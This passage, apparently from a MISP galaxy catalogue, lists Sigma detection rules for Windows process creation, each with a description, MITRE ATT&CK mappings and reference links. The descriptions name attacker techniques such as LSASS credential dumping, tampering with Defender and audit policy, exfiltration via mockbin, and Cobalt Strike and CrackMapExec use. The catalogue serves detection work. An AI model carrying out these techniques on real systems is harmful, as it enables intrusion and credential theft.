  • related-to: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 10384. Table References

Links

https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/

https://redcanary.com/threat-detection-report/threats/qbot/

https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml

HackTool - CrackMapExec Execution

This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.

The tag is: misp-galaxy:sigma-rules="HackTool - CrackMapExec Execution"

HackTool - CrackMapExec Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"

Table 10385. Table References

Links

https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz

https://www.mandiant.com/resources/telegram-malware-iranian-espionage

https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject

https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml

Change PowerShell Policies to an Insecure Level

Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag.

The tag is: misp-galaxy:sigma-rules="Change PowerShell Policies to an Insecure Level"

Change PowerShell Policies to an Insecure Level has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10386. Table References

Links

https://adsecurity.org/?p=2604

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1

https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml

DumpStack.log Defender Evasion

Detects the use of the filename DumpStack.log to evade Microsoft Defender

The tag is: misp-galaxy:sigma-rules="DumpStack.log Defender Evasion"

Table 10387. Table References

Links

https://twitter.com/mrd0x/status/1479094189048713219

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml

Files Added To An Archive Using Rar.EXE

Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

The tag is: misp-galaxy:sigma-rules="Files Added To An Archive Using Rar.EXE"

Files Added To An Archive Using Rar.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 10388. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md

https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_compress_data.yml

Rundll32 Execution Without Parameters

Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module

The tag is: misp-galaxy:sigma-rules="Rundll32 Execution Without Parameters"

Rundll32 Execution Without Parameters has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 10389. Table References

Links

https://bczyz1.github.io/2021/01/30/psexec.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml

Potential Register_App.Vbs LOLScript Abuse

Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.

The tag is: misp-galaxy:sigma-rules="Potential Register_App.Vbs LOLScript Abuse"

Potential Register_App.Vbs LOLScript Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10390. Table References

Links

https://twitter.com/sblmsrsn/status/1456613494783160325?s=20

https://github.com/microsoft/Windows-classic-samples/blob/7cbd99ac1d2b4a0beffbaba29ea63d024ceff700/Samples/Win7Samples/winbase/vss/vsssampleprovider/register_app.vbs

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolscript_register_app.yml

AddinUtil.EXE Execution From Uncommon Directory

Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.

The tag is: misp-galaxy:sigma-rules="AddinUtil.EXE Execution From Uncommon Directory"

AddinUtil.EXE Execution From Uncommon Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10391. Table References

Links

https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml

Command Line Execution with Suspicious URL and AppData Strings

Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)

The tag is: misp-galaxy:sigma-rules="Command Line Execution with Suspicious URL and AppData Strings"

Command Line Execution with Suspicious URL and AppData Strings has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10392. Table References

Links

https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100

https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_http_appdata.yml

PUA - DIT Snapshot Viewer

Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.

The tag is: misp-galaxy:sigma-rules="PUA - DIT Snapshot Viewer"

PUA - DIT Snapshot Viewer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 10393. Table References

Links

https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap

https://thedfirreport.com/2020/06/21/snatch-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_ditsnap.yml

MMC20 Lateral Movement

Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe

The tag is: misp-galaxy:sigma-rules="MMC20 Lateral Movement"

MMC20 Lateral Movement has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

Table 10394. Table References

Links

https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml

Renamed PsExec Service Execution

Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators

The tag is: misp-galaxy:sigma-rules="Renamed PsExec Service Execution"

Table 10396. Table References

Links

https://www.youtube.com/watch?v=ro2QuZTIMBM

https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml

Operator Bloopers Cobalt Strike Commands

Detects use of Cobalt Strike commands accidentally entered in the CMD shell

The tag is: misp-galaxy:sigma-rules="Operator Bloopers Cobalt Strike Commands"

Operator Bloopers Cobalt Strike Commands has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 10397. Table References

Links

https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/

https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf

https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml

Audit Policy Tampering Via Auditpol

Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.

The tag is: misp-galaxy:sigma-rules="Audit Policy Tampering Via Auditpol"

Audit Policy Tampering Via Auditpol has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 10398. Table References

Links

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_auditpol_susp_execution.yml

Chromium Browser Headless Execution To Mockbin Like Site

Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).

The tag is: misp-galaxy:sigma-rules="Chromium Browser Headless Execution To Mockbin Like Site"

Table 10399. Table References

Links

https://www.zscaler.com/blogs/security-research/steal-it-campaign

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml

Potential Commandline Obfuscation Using Unicode Characters

Detects potential commandline obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.

The tag is: misp-galaxy:sigma-rules="Potential Commandline Obfuscation Using Unicode Characters"

Potential Commandline Obfuscation Using Unicode Characters has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10400. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http

https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml

Powershell Token Obfuscation - Process Creation

Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation

The tag is: misp-galaxy:sigma-rules="Powershell Token Obfuscation - Process Creation"

Powershell Token Obfuscation - Process Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Embedded Payloads - T1027.009" with estimative-language:likelihood-probability="almost-certain"

Table 10401. Table References

Links

https://github.com/danielbohannon/Invoke-Obfuscation

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_token_obfuscation.yml

PUA - Radmin Viewer Utility Execution

Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines

The tag is: misp-galaxy:sigma-rules="PUA - Radmin Viewer Utility Execution"

PUA - Radmin Viewer Utility Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"

Table 10402. Table References

Links

https://www.radmin.fr/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_radmin.yml

Windows Firewall Disabled via PowerShell

Detects attempts to disable the Windows Firewall using PowerShell

The tag is: misp-galaxy:sigma-rules="Windows Firewall Disabled via PowerShell"

Windows Firewall Disabled via PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 10403. Table References

Links

https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_disable_firewall.yml

Browser Started with Remote Debugging

Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks

The tag is: misp-galaxy:sigma-rules="Browser Started with Remote Debugging"

Browser Started with Remote Debugging has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"

Table 10404. Table References

Links

https://github.com/defaultnamehere/cookie_crimes/

https://github.com/wunderwuzzi23/firefox-cookiemonster

https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf

https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_remote_debugging.yml

Suspicious Kernel Dump Using Dtrace

Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1

The tag is: misp-galaxy:sigma-rules="Suspicious Kernel Dump Using Dtrace"

Suspicious Kernel Dump Using Dtrace has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 10405. Table References

Links

https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace

https://twitter.com/0gtweet/status/1474899714290208777?s=12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml

Privilege Escalation via Named Pipe Impersonation

Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.

The tag is: misp-galaxy:sigma-rules="Privilege Escalation via Named Pipe Impersonation"

Privilege Escalation via Named Pipe Impersonation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Services - T1021" with estimative-language:likelihood-probability="almost-certain"

Table 10406. Table References

Links

https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml

Suspicious Double Extension File Execution

Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns

The tag is: misp-galaxy:sigma-rules="Suspicious Double Extension File Execution"

Suspicious Double Extension File Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 10407. Table References

Links

https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html

https://twitter.com/blackorbird/status/1140519090961825792

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml

Suspicious Rundll32 Setupapi.dll Activity

setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.

The tag is: misp-galaxy:sigma-rules="Suspicious Rundll32 Setupapi.dll Activity"

Suspicious Rundll32 Setupapi.dll Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10408. Table References

Links

https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20

https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf

https://lolbas-project.github.io/lolbas/Libraries/Setupapi/

https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml

Suspicious Execution From GUID Like Folder Names

Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks

The tag is: misp-galaxy:sigma-rules="Suspicious Execution From GUID Like Folder Names"

Suspicious Execution From GUID Like Folder Names has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10409. Table References

Links

https://twitter.com/Kostastsale/status/1565257924204986369

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml

Visual Studio Code Tunnel Service Installation

Detects the installation of VsCode tunnel (code-tunnel) as a service.

The tag is: misp-galaxy:sigma-rules="Visual Studio Code Tunnel Service Installation"

Visual Studio Code Tunnel Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 10410. Table References

Links

https://ipfyx.fr/post/visual-studio-code-tunnel/

https://code.visualstudio.com/docs/remote/tunnels

https://badoption.eu/blog/2023/01/31/code_c2.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_service_install.yml

Suspicious Scheduled Task Name As GUID

Detects creation of a scheduled task with a GUID like name

The tag is: misp-galaxy:sigma-rules="Suspicious Scheduled Task Name As GUID"

Suspicious Scheduled Task Name As GUID has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10411. Table References

Links

https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/

https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_guid_task_name.yml

Suspicious Key Manager Access

Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)

The tag is: misp-galaxy:sigma-rules="Suspicious Key Manager Access"

Suspicious Key Manager Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"

Table 10412. Table References

Links

https://twitter.com/NinjaParanoid/status/1516442028963659777

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_keymgr.yml

Stop Windows Service Via PowerShell Stop-Service

Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service"

The tag is: misp-galaxy:sigma-rules="Stop Windows Service Via PowerShell Stop-Service"

Stop Windows Service Via PowerShell Stop-Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 10413. Table References

Links

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/stop-service?view=powershell-7.4

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_stop_service.yml

Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution

Detects potentially suspicious child processes launched via the ScreenConnect client service.

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution"

Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10414. Table References

Links

https://www.mandiant.com/resources/telegram-malware-iranian-espionage

https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708

https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml

Potential PowerShell Execution Via DLL

Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll

The tag is: misp-galaxy:sigma-rules="Potential PowerShell Execution Via DLL"

Potential PowerShell Execution Via DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10415. Table References

Links

https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_dll_execution.yml

Suspicious Recursive Takeown

Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders

The tag is: misp-galaxy:sigma-rules="Suspicious Recursive Takeown"

Suspicious Recursive Takeown has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001" with estimative-language:likelihood-probability="almost-certain"

Table 10416. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_takeown_recursive_own.yml

Windows Defender Definition Files Removed

Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files

The tag is: misp-galaxy:sigma-rules="Windows Defender Definition Files Removed"

Windows Defender Definition Files Removed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10417. Table References

Links

https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml

Execution via WorkFolders.exe

Detects using WorkFolders.exe to execute an arbitrary control.exe

The tag is: misp-galaxy:sigma-rules="Execution via WorkFolders.exe"

Execution via WorkFolders.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10418. Table References

Links

https://twitter.com/elliotkillick/status/1449812843772227588

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml

Suspicious Command Patterns In Scheduled Task Creation

Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands

The tag is: misp-galaxy:sigma-rules="Suspicious Command Patterns In Scheduled Task Creation"

Suspicious Command Patterns In Scheduled Task Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10419. Table References

Links

https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf

https://twitter.com/RedDrip7/status/1506480588827467785

https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_susp_pattern.yml

Tamper Windows Defender Remove-MpPreference

Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet

The tag is: misp-galaxy:sigma-rules="Tamper Windows Defender Remove-MpPreference"

Tamper Windows Defender Remove-MpPreference has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10420. Table References

Links

https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_remove_mppreference.yml

Potential Credential Dumping Via WER

Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass

The tag is: misp-galaxy:sigma-rules="Potential Credential Dumping Via WER"

Potential Credential Dumping Via WER has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10421. Table References

Links

https://github.com/deepinstinct/Lsass-Shtinkering

https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml

PUA- IOX Tunneling Tool Execution

Detects the use of IOX - a tool for port forwarding and intranet proxy purposes

The tag is: misp-galaxy:sigma-rules="PUA- IOX Tunneling Tool Execution"

PUA- IOX Tunneling Tool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 10422. Table References

Links

https://github.com/EddieIvan01/iox

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_iox.yml

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION

Detects Obfuscated Powershell via VAR++ LAUNCHER

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION"

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10423. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml

Suspicious CustomShellHost Execution

Detects the execution of CustomShellHost binary where the child isn’t located in 'C:\Windows\explorer.exe'

The tag is: misp-galaxy:sigma-rules="Suspicious CustomShellHost Execution"

Suspicious CustomShellHost Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10424. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/pull/180

https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml

Dllhost.EXE Execution Anomaly

Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.

The tag is: misp-galaxy:sigma-rules="Dllhost.EXE Execution Anomaly"

Dllhost.EXE Execution Anomaly has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 10425. Table References

Links

https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf

https://redcanary.com/blog/child-processes/

https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dllhost_no_cli_execution.yml

Elevated System Shell Spawned From Uncommon Parent Location

Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location.

The tag is: misp-galaxy:sigma-rules="Elevated System Shell Spawned From Uncommon Parent Location"

Elevated System Shell Spawned From Uncommon Parent Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10426. Table References

Links

https://github.com/Wh04m1001/SysmonEoP

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml

Renamed CreateDump Utility Execution

Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory

The tag is: misp-galaxy:sigma-rules="Renamed CreateDump Utility Execution"

Renamed CreateDump Utility Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10427. Table References

Links

https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/

https://twitter.com/bopin2020/status/1366400799199272960

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_createdump.yml

Assembly Loading Via CL_LoadAssembly.ps1

